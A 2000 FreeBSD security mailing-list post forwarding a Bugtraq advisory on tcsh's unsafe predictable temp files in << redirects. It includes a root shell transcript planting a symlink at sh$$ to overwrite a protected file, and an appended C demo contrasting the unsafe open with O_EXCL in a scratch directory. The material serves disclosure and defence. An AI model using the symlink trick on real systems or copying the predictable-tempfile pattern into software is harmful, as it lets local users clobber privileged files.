Date: Mon, 30 Oct 2000 13:26:41 -0800
From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
To: freebsd-security@freebsd.org
Subject: tcsh: unsafe tempfile in << redirects (fwd)
Message-ID: <200010302127.e9ULRCe24280@cwsys.cwsent.com>
Our tcsh appears vulnerable. So is the 44bsd-csh port.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message

[headers removed]
Message-ID: <39FBAAF7.D4F258A4@energymech.net>
Date: Sun, 29 Oct 2000 04:43:35 +0000
Reply-To: proton <proton@ENERGYMECH.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: proton <proton@ENERGYMECH.NET>
Subject: tcsh: unsafe tempfile in << redirects
To: BUGTRAQ@SECURITYFOCUS.COM

PROBLEM:

/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
- -rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
- -rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

VULNERABLE VERSIONS:

6.07.02 (Astron) 1996-10-27
6.08.00 (Astron) 1998-10-02
6.09.00 (Astron) 1999-08-16 (latest)
(no other versions tested)

FIX:

make sure root (and other sensitive user accounts) doesn't have
any predictable jobs (cron, ~/.cshrc, ...) that use tcsh AND
`<<' redirects.

patch the source somehow..
(available at ftp://ftp.astron.com/pub/tcsh/ )

/proton

------- End of Forwarded Message

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
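
Added example, not part of the original message and not tcsh's source: a C program that reproduces the clobbering seen in the transcript inside a private scratch directory, next to the exclusive-create open that refuses the pre-planted symlink. The open flags, function names and scratch paths are assumptions chosen to match the `FOO` / `o world` result above.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Unsafe pattern (assumed): predictable name, open() follows a planted symlink. */
static int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0600);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails with EEXIST if anything,
 * including a symlink (dangling or not), already exists at that name. */
static int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Returns 1 if the file still holds the original 12 bytes. */
static int unchanged(const char *path) {
    char buf[32] = {0};
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    return n == 12 && memcmp(buf, "hello world\n", 12) == 0;
}

/* Builds a scratch dir holding a victim file and a symlink to it at the
 * predictable temp name, then writes here-document data through one opener.
 * Returns 1 if the victim was overwritten, 0 if not, -1 on setup failure. */
int victim_clobbered(int use_exclusive) {
    char dir[] = "/tmp/heredoc-demo-XXXXXX";      /* constructed sample paths */
    char victim[64], tmpname[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/rootfile", dir);
    snprintf(tmpname, sizeof tmpname, "%s/sh12660", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("hello world\n", f); fclose(f);
    if (symlink(victim, tmpname) != 0) return -1;
    int fd = use_exclusive ? open_exclusive(tmpname) : open_predictable(tmpname);
    if (fd >= 0) { if (write(fd, "FOO\n", 4) < 0) perror("write"); close(fd); }
    int clobbered = !unchanged(victim);
    unlink(tmpname); unlink(victim); rmdir(dir);
    return clobbered;
}

int main(void) {
    printf("predictable: %d, O_EXCL: %d\n", victim_clobbered(0), victim_clobbered(1));
    return 0;
}
```

mkstemp(3) gives the same exclusive create together with an unpredictable name, which is the usual replacement for a `sh$$`-style temp file.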